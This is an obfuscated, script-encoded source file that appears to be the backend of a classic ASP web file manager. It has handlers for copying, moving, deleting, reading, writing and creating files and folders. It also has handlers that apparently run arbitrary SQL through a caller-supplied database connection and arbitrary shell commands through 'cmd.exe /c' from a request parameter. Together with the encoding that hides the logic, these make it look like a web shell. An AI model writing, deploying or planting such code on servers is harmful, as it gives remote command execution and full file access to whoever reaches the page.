nXY@#@&dGk:,0bs+}4%+1YS~sXq	WWBP0Ks[+M1m:n~~WKV[+M(NBPUnS1lhn@#@&@#@&iWKV[Dgl:P{~I;;+kYcE6WV9nDgl:Eb@#@&d6WsNn.&N~',]+$EndD`JWG^NnD&[r#@#@&d	+hglsnP{P]+$EndD`J	nhgl:Eb@#@&@#@&dd+O~N/~',U+SPBj}1@#@&7k+OPsz&xWKP{P/D7nDcm.+mYn6(L+1O`r/mMr2YbxTR[k^ObWUlMzJ*@#@&@#@&d?nO,0rV6(Ln1Y,'P6/K MYoW^Nn.v0W^[+MSW1COkKx,[~0Gs9+.1mh+*@#@&76kVn6(LnmD glhP{PxhgC:@#@&db0~3MDRg;:(+D,@!@*PZPDtnx@#@&idhX&U0KRC[9PJn.MW.JB~AD.c1!:4D@#@&di:zq	0G mNN,E+MDWM9n/1JBPEjUC(VnPDGPM+UCs+PEErP'P6G^NnM1m:+,[,EJrPZJi[~-(ZDdoPLP2M. f/1DrwOrKx@#@&inVk+@#@&id:z(	0GRm[9PEDMWDr~,T@#@&d7:HqUWKRl9[Pr+DMG.f/1JSPEE@#@&7+	[Pb0@#@&i2D. ;VnlM@#@&@#@&idSkY4Pszq	0G@#@&d77clN9~J6WV9n.q9JBPWWs[D(N@#@&did C9NPEUhHlsnr~~	+S1ls+@#@&did l9N~EmmYbGxr~Pr.nxm:sGV[nMJ@#@&i7dcl[[,J0Gs9+.1mhJS,0KVNDgC:@#@&did C9NPrh/TI+k2Gxk+r~~J]n	lh+9~JrJ~',0Ws[DHlsn,[~rJrPYKPrEJ,[~JrJE~LPxA1m:+,'~JrJ,"E@#@&7i+UN,AkDt@#@&@#@&dC%m6]+	Cs+oKV9+D,',%/cYG9UrHcrlmDrW	J~,hzq	0K~~Y.;#@#@&UN,0;U1YkGU@#@&@#@&@#@&6EU1YbWx,lNC6;W2Xv#@#@&iWx,nDMWD,.n/!:PU+aO@#@&7fbhPsX(U6W~~OmDL+DKmY4BP6WV9+Mdq9~~0bVnd&N~,UNbD~,UWk^+BP[k.S,0rVSPbYnhgl:nS,kO+sKmY4BPTH/T@#@&@#@&i/nY,Ld~{PxAPx?rg@#@&dk+DPhX(U6W~',d+M\n.cmDnCD+64Nn1Ycr/1DkaYbUocNrmDkGUmDXrb@#@&@#@&iOCDT+DnCY4xmN[/^C/4`]n$E+dOvJOlMLYKmY4J#*@#@&@#@&i0GV9+.d&NP{~I;EdO`r0KV[+.d&NE#@#@&d6ksnkqN~x,In;!nkYcr0bV+kq9E#@#@&@#@&ix[rM'I5E/YvE[6r#cZGEUO@#@&7x6rV']n$E+dOvJW6rbcZG!xD@#@&@#@&ir0,`UNbD@*T*PY4nx@#@&diL\/T'rZGwzr	o~0KsNDcd*PYG~rJEPL~Dl.T+DnlDt,'PrJEPcR E@#@&di7sKDPAC^t,NbD~qU~"+5EdYvJ[ar#@#@&7id7kDns1Cs+{NkM@#@&7didrY:KCDt'6GV9+DdG^lDkKx~[~rD+h1mh+@#@&77idsj6cZGwHoKV[D,kY:hCY4~~YmDLnDnlD4~,YD!n@#@&ididLHdL{o\/T~[,\8/MSs~',JRPr~LPrD+s1ls+,'Pr)~J@#@&77iddbWPADDcH;:(+M@!@*!~O4+U@#@&7did77TH/LxTHdo,',JnMDKDPvJ,~[,2.Dcfnd1DkaOkKxP,'~J*J@#@&7d77id3DM Z^+C.@#@&d77idnVkn@#@&7ididdTHkL'THdo,[~EkEm1n/kJ@#@&77didx[PrW@#@&7diH+XY@#@&i+x[~b0@#@&@#@&ikW,`	0k^+@*T#,Y4+	@#@&7ik0,cx9kD@*TbPDtx~o\dT'~otdo,[~-(ZDJo,[~\(/MSo@#@&idot/Txot/LPLPE/KwXbUo,0k^nc/*PDW~JEE,[~Ym.oYKCDtP'~rJEPc cJ@#@&disWMPACm4PWk^+~(	PI5E/YvEW6r#@#@&7d77bYn:gC:'Wr^+@#@&7id7kDnsnCDt{0W^N.SKmCYbWU~LPkDn:gl:@#@&didisjr /Kwzsbs+,kOnsnlO4BPOlMLYKmY4~PDD!n@#@&d7dio\dT'otdo,[P78/Dds,[~JR~rP'PbO+s1ChP[~E=PE@#@&7id7ik6P2MDcHEs4nD@!@*T~Dt+	@#@&iddi77ot/T'LHdL,[~J.DKD~crPP'~AD.RGnkm.bwDkW	P,'Pr#E@#@&d77iddA.DcZVC.@#@&did7dnsk+@#@&i7did7Lt/oxLt/LPL~r/;1m//r@#@&7did7+	N~r6@#@&i716Y@#@&7+	N,kW@#@&@#@&dr0,3DMRH;s4+.~@!@*~!,O4+U@#@&id:Hq	WWcl[N,Jn.MWDrSPADDcH;:(+M@#@&d7hHqU0K l9N~EDDG.G+dmrS,2.MRG+/1Db2YbWUdLP-8;DSw~[,oHkL@#@&i+^/n@#@&7i:zq	WWcl[[,J+..KDE~,T@#@&7i:Hqx6WcCN9PE+MDG.G+/1E~,oHkL@#@&i+	N~kW@#@&d3DM Z^+C.@#@&@#@&7ihrY4~sX(	0K@#@&idi l9N~JmmOrKxJB~J1WwHE@#@&idiRCN[~r0GV9nDkq[EBP0Gs9+./&[@#@&7idclN9PrWk^+dq9JS~6kVdq9@#@&i77RmN9PE:dL"+dwKU/JS~TH/L@#@&d7+	[,hrDt@#@&@#@&dm%lXZGwHPx~N/RDG9Ur1vECmDkKxE~~hHqU0KSPDD;n*@#@&nU9PWE	^DkG	@#@&@#@&6E	^YbWUPmLCatW\c#@#@&dKU~+MDKD~Dnd!:nP	n6D@#@&7Gk:~hHqU0KS,YCMoYnmY4SP6WsNDd(9~P6rV/q9S~x9kM~~xWr^+SP9rDBPWr^+~~rD+h1mh~~bY:nmY4SPTHdo@#@&@#@&i/+D~LkP',Unh,9UrH@#@&7k+OPszq	0G~{P/n.7+.R1.lOr(L+1YvE/1DrwDkULcNk1OkKxlMzE#@#@&@#@&7YC.T+OnmOt{l[[kVld4vIn;!nkYcrYmDoYhCY4Jb#@#@&@#@&i0W^[+M/q9~xPrJ@#@&70rs/(N,xPrJ@#@&@#@&dU[bDxI5!+dD`rN6r#c/W!xO@#@&dUWbV+{]+$E+kOcJ66r# ZG;	Y@#@&@#@&db0~c	Nk.@*Z#~Y4n	@#@&idTH/T'r\W7kUo,0Gs9+Dvd#,YW,EEJ,[,YCDLnDnCY4~[,JEE,RR E@#@&7dioKD~Al1tP9kM~q	P]+$EndD`J9aJ*@#@&i77dbY:Hlhn{NrD@#@&did7rD+:KCDtx0Ks9+.dW1lYbW	~[,kO+s1Ch@#@&i7dis?} \W7+wWsNn.,kO+sKlDtS~DlDLnDnCY4@#@&d7idTH/T'T\/TP'P74/.dsPL~J PJ,'~kD+s1C:n~LPE),E@#@&d77idkW~AD.Rg;s4nM@!@*!PDtU@#@&d7did7Lt/o{LHkoPL~E+MDKD~`E~,[~2M.RG+d^MkwOrKx~PL~r#E@#@&iddidi3DMR/Vl.@#@&ddi7dV/@#@&didid7o\dT'LHkLPLPEd!mmndkJ@#@&i7id7i0KVNDk(N,'~0KV[nM/q9~[,kYhHls+,[~JkE@#@&7di7dx[~b0@#@&7idH+XO@#@&7x9Pk6@#@&@#@&ikWPvxWr^+@*ZbPDt+	@#@&dik6Pcx[rM@*T#,Otx~Lt/ox~THdo,',\8;DdsPLP78ZMSo@#@&d7Lt/o{LHkoPL~EHK\bxLPWr^+c/*~YKPEErP[~OmDL+DKmY4,[,JJrPc Rr@#@&disG.,2l14P6kV~(x,I;;+dOvJW6rb@#@&d77ikYnhglh+{WbVn@#@&iddikDn:hlOt{0Gs9+DdGmmYkKU~[,kD+h1Ch@#@&di7dw?6 tW\nobVnPbO:KmY4~YmDTnYhlOt@#@&77idotdo{oHkL~[,\(Z.So~LPEO,EPLPrO:1ChP'Prl,J@#@&diddik6~2MD 1!:8nM@!@*Z~Y4+x@#@&7dididLHdL{o\/T~[,Jn.MWD~crP~[,3MD G+kmDbwDrW	P~[,JbE@#@&di7did2M. Z^+mD@#@&77id7+^d+@#@&77idd7Lt/L'T\ko~LPr/E1md/r@#@&did77i0k^n/&NP{~Wk^+kq[P'~bYn:gC:P'~ruJ@#@&id7din	N~b0@#@&di1aY@#@&7+	N~r6@#@&@#@&db0PA..RgEs4nD~@!@*PTPD4+	@#@&7i:X(U6W l9[,JnMDKDJBPA.Dc1;:(+.@#@&ddszq	0WcC[N,JD.W.9/^JB~2MD 9/m.raYrW	7LP-(ZMSs,[,LHko@#@&i+sd@#@&i7:Hqx6G l9N,JnD.GMJSPZ@#@&idhz&x0G mN[PrnMDGMf/mr~,LHko@#@&i+U[,k0@#@&@#@&ddSrOt,:HqU0G@#@&d7dcCN9PEC1YkGUr~~JsG7+E@#@&iddcl9[Pr0GV9+.d&NJB~0KVN.dq9@#@&d7d C9N~J6rV/([r~PWr^+dq9@#@&d7iRmNN,Jsdo"+dwKxdnr~PT\/T@#@&i7nx9PSkOt@#@&@#@&7lNC6tW-n,'P%dcYG9U6g`EmmDkW	JB~:HqU0K~~OME+*@#@&xN,W;x1YbWU@#@&@#@&@#@&0!UmDkGU,lLCaG+s+Dnv#@#@&dKxPDMGD,Dn/!:n~	+6D@#@&ifks~hX&x6WSPWG^NnDk(NBPWr^+/([BPUNb.BPU6k^+~,Nb.~,0rV~~rD+:gC:~PbOn:hlDtSPL\ko@#@&@#@&dk+O~N/Px~	+APxj}1@#@&dk+Y,:H(x6W~',/n.7+Dc^DlY68LmD`E/^.bwOk	LR9k^ObWxC.HJb@#@&@#@&dWKV9+Dkq9~',JE@#@&dWr^+/&[P{PJr@#@&@#@&d	NrDx];;+kO`rNaE*RZG;	Y@#@&iU6ks'"+;!+kO`r0aJ*R/G!xY@#@&@#@&dk6~cx9kM@*T#~O4+U@#@&7dTHdL{JfnsYrxT~6Ws9+M`/*Pc Rr@#@&didoGMP2m^t,NkM~(x,I;;+dOvJ[6rb@#@&d77ikYnhglh+{[bD@#@&diddbYhnmY4'6Ws[DSK^lDkW	~'PbY:Hlhn@#@&7di7sUr 9V+OnwWsN.,kO:hlY4~D.E@#@&did7Lt/o{LHkoPL~-4;Dds~[~E PEPL~kD+hHm:+~',JlPr@#@&d7idik0,2M.RgEh4D@!@*ZPY4nx@#@&di77diot/L'L\ko~[,E+MDG.,`J~~LP3DM G+d1DbwYbW	~PLPE#r@#@&7iddi72MDR;snlM@#@&d7d77Vd+@#@&did77ioHdL{o\/T~LPEkE1m+k/r@#@&id7didWG^N+Mdq9P',WGV9+M/(N~',kO+sHls+~',JuE@#@&d7di7x[,k6@#@&idiH+XY@#@&i+U[,k0@#@&@#@&dk6~cx6k^+@*!b~Dtnx@#@&dikW~vxNr.@*!bPD4x~THko',otdo,[~\(Z.JwP[,-4;DSw@#@&diot/L'L\ko~[,EfVnObxo~WbVn`kb,R cJ@#@&disK.PAl^t,0rsPq	~I;EdO`r0XJb@#@&7id72M.R;VnCM@#@&77idrYhglh'6kV@#@&7didrY:KCDt'6GV9+DdG^lDkKx~[~rD+h1mh+@#@&77idsj6cfnVOsr^+,kY:hCY4~OD!+@#@&iddiLHko'T\do,[,\8Z.JwP'PrRPrP'~bY+hHm:nPL~r)~r@#@&ddidir0,2.Dc1;h(+D@!@*!,YtU@#@&idid7dL\koxotdo,[~EDDG.,`EP,',2.MRG+/1Db2YbWUP,[~E*J@#@&7diddi3.DcZ^+CD@#@&id7dinVk+@#@&idd77io\/TxTHdTPLPJkE1^+k/E@#@&d77idd6rV/q9~xP6k^+dq[~LPrYh1m:n~LPJkE@#@&7di7i+U9Pb0@#@&diH+XY@#@&i+U[,k0@#@&@#@&dk6~3DMRgEh4n.,@!@*PZ~Y4+U@#@&ddhz&xWWcC9N~r+MDWMJB~2MD 1!:8nM@#@&i7:Hqx6G l9N,JnD.GMfn/1E~,2..cf+d^Mk2YbG	d',\(ZDds,'PTHdo@#@&7n^/+@#@&di:X&UWWcl9N~Jn.MW.JB~!@#@&77sXqUWKRCN9~r+.MWMf+kmrSPTHdo@#@&7n	NPbW@#@&@#@&i7AkDt,:zqUWK@#@&di7RmN[~rlmOrKxE~,E9+sYJ@#@&di7RmN[Pr0Gs9+Dk(Nr~P6GsNDkq[@#@&7id l9[Pr0rs/q[EBPWk^nkq[@#@&iddcl9[Pr:do"+d2Kx/E~,oHkL@#@&idx[PArDt@#@&@#@&dmLCaG+VnOPxPNdcYGx?}1`rl1OkKxE~,:z(	0WB~YME+*@#@&+	N,0;x^ObWU@#@&@#@&6EU^DkWU~mLC6";	?}d`*@#@&iW	~+MDGD,Dnd!:+,U+XY@#@&79ksPsX(xWGBP^W	U+1YrG	~P^Gs:Cx9S,Dul9+D@#@&i[ksPCNKZGUBPDU@#@&iNks~r~bxDbW0n^D+[@#@&@#@&imGU	+mOrKxxD5!+dDR6WDs`r^W	xnmDkGUr#@#@&7mK::mU['M+$En/O 6W.:vEmK:hC	NJb@#@&drxD)60n1YNP{P q@#@&@#@&dk+O~N/P{~xhPxj61@#@&i/nY~hHqU0K~',/n.7+D ^M+CY6(Ln1YvJ/1Db2YbxLR9k^ObWxm.Xr#@#@&7d+DPmNGZGU{?nD7nDcZ.nmY+68N+^YvEzf6GAcZW	x^YbWUJ*@#@&7mNW;GxcrwU~mKx	+^YrG	@#@&@#@&7k6P3.MR1;h(+.@!@*T,Y4x@#@&di:H(x6W l9N~EDDK.JBP2M. 1!:(+.@#@&7i:zq	WWcl[[,J+..KD9+k^r~~ADMRf/1.kaYrW	@#@&7V/@#@&id/O~DU'mNGZGUc2a+1;Y`^Gs:lU[BPrxD)60n1YN#@#@&@#@&dikWPAD. gE:(nD@!@*!,O4+	@#@&d7dhz&xWWcCN9PEnMDW.EBP3DM gEh(+M@#@&idihX&xWWcl[[,J+M.WMf+k^E~,2MD fnd1DrwDrW	@#@&7i+Vdn@#@&7dihHqU6WclN9PrnDMW.JBPT@#@&ddihX&x0K CN9Pr+.DG.G+dmrSPrJ@#@&iddvhHqU0K mN[,Js/o"+k2W	/nJBPEj5SP;G:slx9~36m!YnPj;1mn/kWE^PZE@#@&d7n	N~k6@#@&@#@&idb0PvDU sb+sNkR/G!xY@*T#,YtU@#@&idiDnNrh,Du+m[+M`.jcskns9/ ZK;	YR8#@#@&did6GD,kx!,YG~M?Rwr+^N/c/GE	Y F@#@&77idr0,cDURorVNdcb# 1mh'Er#,Ytx@#@&did7dMCnC9+Dvr#,'PrcHW,mKV;:U~	lh+*E@#@&d77i+Vdn@#@&7di7iDul9+Dvk*~',?nD7+. _Y:^3x1WNc.?csb+sNdcb# 1mh+*@#@&7iddnU9Pr0@#@&id7	+XY@#@&dinVk+@#@&id7.UP',EJ@#@&di7.Cl9+.Px~rJ@#@&i7+	N~r6@#@&7n	N~k6@#@&@#@&@#@&ihkDt,hX&xWW@#@&77clN9~JmmYbGUJBPrD;xj}dJ@#@&i7RmN[~rl0Wn1YnNrS,kUDb60+1Y[@#@&d7RmN[~rt+m[+MJ~,.u+mND@#@&77cl[N,ENmYCEBPDj@#@&dnx9~SkO4@#@&@#@&i/OPM?xxKY4r	o@#@&7/YPm[GZKx{xGY4r	o@#@&@#@&dmLCa"Exj}dPxPNdcYGx?}1`rl1OkKxE~,:z(	0WB~YME+*@#@&+	N,0;x^ObWU@#@&@#@&6EU^DkWU~mLC6";	Z\G`*@#@&iW	~+MDGD,Dnd!:+,U+XY@#@&79ksPsX(xWGBP^Wshl	NS~M+Y;.	ZGxDn	Y@#@&@#@&dmK:sCx9'.+$EndDR0K.:vJmKhhl	Nr#@#@&7.Y;D	/W	YnUDP'~Er@#@&@#@&7k+O,LkP',xAPx?61@#@&7dYPszq	0W,x~/D7+.R^.lO+}8LmOcr/m.raYrxT 9k^DkKxlMXrb@#@&d.+DE.U;WxDnxDP',dnD7+MR^DnCD+G4NnmD`EAkmDr2DRdts^Jbc+X+mvJ1hNc+a+,z^~r[mKh:mxN* dY9W!Y DnC9lsV@#@&db0~3MDRH;s4nD,@!@*PT,Y4+x@#@&i7:HqU0KRC[9PJ.DKDJB~3DMRgEh4n.@#@&7dszq	0G mNN~ED.WM9/^r~,2DMRGn/1DrwDkGU@#@&ds/@#@&i7hX&x6W l[[,JnDMGDr~~T@#@&d7hHqU0K mN[,JDDKDGn/1JSPrJ@#@&i+x9~k6@#@&@#@&7hbY4PhX(U6W@#@&i7RmN[~rlmOrKxE~,EMEU;HGJ@#@&di l9N~JM+O;MxZKUYxYrS~DY!DUZGUD+UY@#@&dx[~SkY4@#@&@#@&dm%m6]!x;Hf,',%/cYG9UrHcrlmDrW	J~,hzq	0K~~Y.;#@#@&UN,0;U1YkGU@#@&@#@&6;	mObW	PlNlXJWmNok^+cb@#@&dKUPDDK.~D/!:nPUnXY@#@&i9ksPhz&x0GS,kO+sKmY4BPbY+sZKUYxO~,0S~6F@#@&@#@&ikYhKlDt{Dn;;nkY 0K.:vJrO:nCO4Jb@#@&7bYnsZKxYxD~',JE@#@&@#@&7k+Y,%/,'P	nAPx?}1@#@&7dY~:H(x6W~x,/+.-D mMnmYn}4N+mD`rdmMk2YbxL 9kmDrW	lDHEb@#@&dk+OPW~{Po?} oYor^+`rO:KlD4*@#@&@#@&ik0,`6 /bynP@*PT~mxN,WRkky~@!PlFy!T!b~Dtnx@#@&di/nO,0F~x,sjrc6a+U:+XYsbVckD+hnmY4S,F#@#@&dikYh/W	YxOPx~6F DCNzVs@#@&d+U[,kW@#@&@#@&dr6PADDc1!h4D~@!@*PT~Dt+	@#@&id:H(U0KRmN[PEnMDGDrSPAD. gE:8nM@#@&dihHqU6WclN9PrnDMW.f/^EBP2M.RG+/1.rwDkKx@#@&7n^/n@#@&7dsX(U6WRC[9PE+M.KDEBPZ@#@&idszq	0GRmN[~r+DMGDG+/1ESPrJ@#@&7+U[,kW@#@&@#@&ihrO4P:z(	0G@#@&7iRC9N,Jl1YbGxr~~J^WC[wkVE@#@&ddcC[N,JbYn:KCDtE~,rY:KCDt@#@&7iRCN9~rkO:UkyJB~0c/ry@#@&7iRl9[PrkYhjk.+:+aYES,sGDsCYUk"nv0Rdr.+b@#@&7iRC9N,JkD+s/W	YnxDJS~bY+s/W	Y+	O@#@&i+	N~hrO4@#@&@#@&7lNlaJKlNor^+~',%kROK9Ur1vJm^YbWUJBPhz&x0KSPDDEb@#@&x9PWEU^DkGx@#@&@#@&@#@&W!xmOrKx~lNCX?C7+wkV`*@#@&iWUPD.GMPDdEs+P	naY@#@&ifr:~hHqU0KSPbYnhhlY4S,kO+s/KxOxD~Pkl7nHKNn~,0qS,oHkL@#@&@#@&irO+snmY4'.n$En/D 0KDhcrkYnhhlOtrb@#@&7bY:ZKxDnxDPxPM+5;/YcWWM:`rrO+sZKxO+UOr#@#@&idl7+\G9+Px~M+5EdDRWKDs`Jkl7nHKNnJ*@#@&7TH/T~',JJ@#@&@#@&ik6`dl-ntW[+,@!@*,%b~Dt+U@#@&d7/m-HG9+,'Py@#@&7+	N~k6@#@&@#@&d/OPN/P{~U+SPx?61@#@&i/nY,hX&xWG,'PdnM\nDc^M+CD+}4LmDcJkm.kaYrUTRNb^YbWxm.zJ*@#@&dd+O~6F~',o?}R62xKnaDsrVcbYnsnmYtB/m-+tW[+BY.;~0ms/#@#@&@#@&d6Fc.kOnvkO+s/W	YnUD#@#@&76F m^Gk+@#@&@#@&dk6PA.Dc1;:(+.@!@*!PD4+	@#@&i7LHko{JixC8^+~YK~hMkOn,YW~O4+~0bsPErJ,[PbYhnmY4PLPEEr~PmUPDDK.~W1m!DnN  cJ@#@&inVk+@#@&ido\dT'EsbsPdm\NPeJ@#@&dx[Pb0@#@&@#@&dbWPADDcH;:(+MP@!@*~T,Y4+	@#@&idhz&x0G mN[PrnMDGMJBP2MDcHEs4nD@#@&77sXq	WWclN9~E+MDKD9+d^r~~2M.RG+d^MkwOrKx7[,-(Z.ds,[PTHkL@#@&dnVk+@#@&id:H(x6WRm[[Pr+MDGDES,!@#@&i7:HqUWKRl[[,JnDMGMfnkmr~PrJ@#@&dx[Pb0@#@&@#@&dSrY4P:H(U0K@#@&d7RC[9PEl1OkKxES,J/C-srVE@#@&7iRmNN,JkC\HGNJS~kl\\W9+@#@&77RmN9PEkOnsnCY4E~,kOnsnlO4@#@&7+	[,hrDt@#@&@#@&dm%lX?C\srsP',%/cYWxj61vJmmOkGUr~~:H(x6WS~DDEnb@#@&nx9~6EU1YbWx@#@&@#@&0!x^YbWU~mLlXH+Ssk^nc#@#@&iWUPn.MW.PMn/!:n~	+6O@#@&d9ks~sX(	0K~PbYh1m:n~,kOnsnlD4~,oHkLSP	+SqO+hS,0q@#@&@#@&ikOns1lhn{Dn;!nkY 6WM:`rkDn:glh+r#@#@&ikYhnmYt{WGV9+MSGmCObWUPL~kD+hHm:+@#@&@#@&7/O,Ld,',x+SPxjrg@#@&dk+O~sXq	WW,'Pkn.\Dcm.+COr8L^YvJd^MkwOr	o Nb^DkG	lMXJ*@#@&@#@&ikWPvsj6csW^[+M26bdO/vkD+hnCO4#x0ms/#~C	NPcoUr sbs2ab/D/`bYhnmY4#{0Csk+#,Otx@#@&7o?}R;DnlOn:+aYwrV`rO:nCO4#@#@&ir6P3MDc1Es4.@!@*!~Y4+U@#@&ddT\/T'J`UC4^+,YGP^.lO+,OtPWr^+PEErP'PbO:Hm:P[,JrE~,lUPD.GMPW1^EM+Nc  J@#@&idhX(U6W l9[Pr+..KDJS~AD.Rg;s4nM@#@&d+^/@#@&idLHkoxE;D+mO+9PY4n~0bVPEJE~LPrYh1m:n~LPJEEcR J@#@&idhHq	0Wcl9[Pr+.DKDES,!@#@&7+	NPbW@#@&i+^/n@#@&7THdo{Ej	l8sPYG~1DnlDn,Y4P6kVPrEJ,[~kD+hHm:+,'PrJJB~OtDPn6rdD/~l,Wk^+~GMPl~WKV[+M~SkO4PDt+,/mh+,xC:R  r@#@&i7:Hqx6G l9N,JnD.GMJSP8@#@&i+U[,k0@#@&@#@&7k6~AD.c1!:4D,@!@*,!~Y4+U@#@&ddszq	0WcC[N,JD.W.9/^JB~2MD 9/m.raYrW	7LP-(ZMSs,[,LHko@#@&i+sd@#@&i7:Hqx6G l9N,JnD.GMfn/1E~,o\dT@#@&7n	N~k6@#@&@#@&i?YP6F,xPw?6RV+OobV+vrY:nmO4#@#@&@#@&7xnA&Yn:,xP6F Um:+~',JkJ,',sGM:mY?byc08Rdk.+b~LPJ-EPLP08 OXa+,[~JkE,[~D2Vmmnc6FR9CD+JlkOtW[b0b+NBPr&JBPEOr#~',Jur~[,D+asCm`6F fCOZ.+mO+9~~EJJ~~E Jb@#@&@#@&dAbY4P:Hq	WW@#@&7dcl[[,Jl1OkKxJB~Exhwks+E@#@&d7Rm[N,JrO:1ChJSPbO:Hm:@#@&idcCN9PE:ko]nkwW	d+r~PT\do@#@&id l[[,JU+S(Y:ES,x+A(D+h@#@&7x[,hbYt@#@&@#@&dmLC6g+AobV+,xPN/RDGB?}1vJCmOrKxE~,hX&xWGBPY.;#@#@&U9PW!x1YkKx@#@&@#@&0;x1YrG	PlNC6g+hwGsNDv#@#@&7G	PnDMGD,Dnd!:+~U6O@#@&7Gkh,:Hqx6WB~kD+h1m:nS,kYhnmYtB~LHkoBPU+A(D+h~,WF@#@&@#@&ikYnhglh+{.;;/DR0KDscJbYn:glhnr#@#@&7kD+:hCOt{0KV[+.JKmCYbGx,[~rD+:HCs+@#@&@#@&i/nDPN/P{P	nh,9jrg@#@&7k+Y,hX&x0K~xPk+M\nD ^M+CY64N+^OvJ/^.bwOk	LcNr1YbWxmDHE#@#@&7/Y~UhqDn:,'Pkn.\Dcm.+COr8L^YvJd^MkwOr	o Nb^DkG	lMXJ*@#@&@#@&ikWPvsj6csW^[+M26bdO/vkD+hnCO4#x0ms/#~C	NPcoUr sbs2ab/D/`bYhnmY4#{0Csk+#,Otx@#@&7o?}R;DnlOnwWsN.`bYnhhlY4b@#@&7k6~AD.c1!:4D@!@*!,Y4+	@#@&7ioHkL'rjxm8s+,YKP^DnCD+~Y4nP6Ws[DPEErP'PbO:Hm:P[,JrE~,lUPD.GMPW1^EM+Nc  J@#@&idhX(U6W l9[Pr+..KDJS~AD.Rg;s4nM@#@&d+^/@#@&idLHkoxE;D+mO+9PY4n~0KV9+.PEErP'PbO+s1ChP[~ErJ RcE@#@&7i:Hqx6WcCN9PE+MDG.r~PZ@#@&i+x9~r0@#@&i+s/n@#@&dLHkL'rjUC(V+~OKP^DCD+~DtP0KV9nD,JEJ,[~rD+:gC:P[,EEJBPDtnDn~6r/DdPmPWr^+PG.,l~0Ks9+.,hbYt,Y4nPklh+,xChRRcE@#@&ddsz(x6Wcl[N~ED.WME~,F@#@&i+x[~b0@#@&@#@&ikW,2MDRgEs8+MP@!@*,!~O4+x@#@&di:X&UWWcl9N~Jn.MW.fdmr~~3MDR9nkm.kaObWUi[,\4;DdoPLPLHko@#@&i+Vkn@#@&ddsz(x6Wcl[N~ED.WM9+kmES,oHdL@#@&7+	[,kW@#@&@#@&dU+D~08PxPw?6 V+YwGV9+DvrO+snmY4#@#@&@#@&7xAqD+h~{P0q 	lh+,',JkrPLPDw^Cm`WFcfCOSlkOHKNk6rnNBPrzE~~E JbPL~J-J~',D+2smmn`6qcfCD+;D+mY[~,J&JBPERr#@#@&@#@&ihkD4~:Hq	0G@#@&7iRCN9~JmmOrKxJS~rxnhwG^NnMJ@#@&diRm[N,JrY:HCs+JB~kD+:gCh+@#@&id l[[,Jh/T]+kwGUk+JS~THdo@#@&id mN9PJ	+S(Y:E~,xnA&Y+s@#@&i+x9~AkDt@#@&@#@&7CNla1AsKV[nMP'~%kROWxj}1crl1YkKxrSPsX(x6WS~DDEb@#@&+x9~WE	mDkGx@#@&@#@&WE	^YbWU~6kVnd6WsN.kSrkYv#@#@&dKUPD.WMP.nkE:~x6Y@#@&7fb:,0SPW^BPWFB~mKEUOD~~^KEUY.&NS,+	Nq9~,hXwWsNDJrkY`*SPsXsbsnSb/D`b~~rD+h?DCDD~~rD+:3U9~~:H(	0GBPDWYmVwrV/SPDWOC^sW^[+M/~,^GE	YD(Ynhk@#@&@#@&7/Y~%kP'~Uh~9U6g@#@&i/YPsX&U0KPxPk+.-DR1.+mY+}8%+1YvJdm.raYrxT NbmOrKxl.zr#@#@&ijY~6P{PsUrc!+DsGV9+.c6WV9nDdWmmOrW	#@#@&7mCs^P3DMul	NsnvJVdO"+dwKUk+E*@#@&dkD+sjYmDO'M+5;/YcWWM:`rrO+s?Dl.YEb@#@&@#@&ir0vkOns?YC.DPxPrE,W.,kD+:UYm.Y,'~JZJb~Dt+	@#@&idkDnh?DlMY~'~q@#@&7+^d+@#@&77bY+hjDl.Y,x,Zr	YvkY:UOlMYb@#@&dnU9Pk6@#@&@#@&dbOn:Ax9PxPrO:jYm.Y,_~qO,@#@&@#@&dr0vrD+hUYmDY,',q#,Y4+	@#@&7i?+D~01P',W ?!4wWsNn.k@#@&di^W!xOnMP'~q@#@&@#@&i7"+[b:,:XwW^[+MSr/D`Tb@#@&dihXwWV9n.Sb/D`T#~x,JUWXa6bxWGr@#@&@#@&idoWM~Al^4P6FP&x,Wm@#@&7diIn[b:Pa.+k+D7n~:HsKV[+.Jb/O`1GE	Yn.*@#@&77idhXwG^NnMSb/YvmK;xD+.#,'~W8Rxmh+,[PrkEPLPM+2VC^`WFc9lD+JCkYHG[b0r+9S,J&r~,JOr#,'PruEPLP.naVl1n`6FRGCO+;DlO+[S,J&JB~J Jb@#@&dd7^KEUY.{mG!xD+D3F@#@&di1n6D@#@&7i?+kdkKx`rhzsKV9+.SrdDJbP{~:HsGs9+DJrkY@#@&@#@&idjY,0m,',WRwks+k@#@&7imW!UYDP{~q@#@&@#@&d7In[b:~:Hok^+JrkY`Tb@#@&7dszwksSb/Yv!*~',JUWX6ar	0Wr@#@&@#@&dioGD,2mm4PWq,qUP6^@#@&d77"+Nrh,w.+knM\n,:Hsk^+dr/D`^W!xOnM#@#@&7di:Xwrs+dkkYcmG;	YnD*~',0q 	l:n~LPEur~LPoKDslYUk.n`6F /bynb,[PrkJ,[P6q YHwP'PEkrP'PMnw^l^nv0F 9mYnSmdDHG9k6k+9~,Ezr~~J Jb~LPJ-EPLPD2sl1+v0qR9CD+/DCYNS~rzJS~rOE#@#@&id71W!xYD{^W!xO+M_q@#@&ddgn6D@#@&i7j+k/bWU`EhHsrVJkkYEb,'Phzwks+drkY@#@&dxN,k6@#@&@#@&7YKYCswWV9nDkP',i$W!x9`j+ddbWU`rhXwWs[DSrdDJb#@#@&iYGDl^sk^+k~',j$W!x[cU+/krW	`Jszok^+dkdYEb*@#@&@#@&7mmVs~ADDuC	Ns+vE^/O"+kwW	/E#@#@&@#@&iIn[b:PszsKVN.JkkYv!b@#@&7sXoW^[+MSrdD`!b~{PExKaX6r	0KJ@#@&@#@&7INr:,:zobV+dr/D`!*@#@&dsXwks+JrkYc!*~',JUGX66rU6WE@#@&71W;	YDqD+sdP{PT@#@&@#@&7b0`bO+s?Ym.OP@!',YGYCswWsN./*PO4x@#@&7ikW`DGDlswW^N+M/,@!',kO+s2U[*PY4nx@#@&di7nx9q9PxPOGDlssKsNDd@#@&ddnsk+@#@&i7i+U9q9P',kDn:Ax[@#@&d7n	NPbW@#@&dd1G;xD+MPxPT@#@&d7sK.P1W;UD+D([,'~kDns?OmDDPYKPUN&N@#@&id7]Nks~wM+/.-+,:HsGV[nMSr/DcmKEUOD#@#@&id7:HoKV[Ddk/D`1GE	YnD*Px~U+/krW	`JszoW^NDJkdOr#cmK;xD+.(9#@#@&7id^W!UD+.{mKExD+MQF@#@&7dimG;	Y+M(Y:/,x~mKE	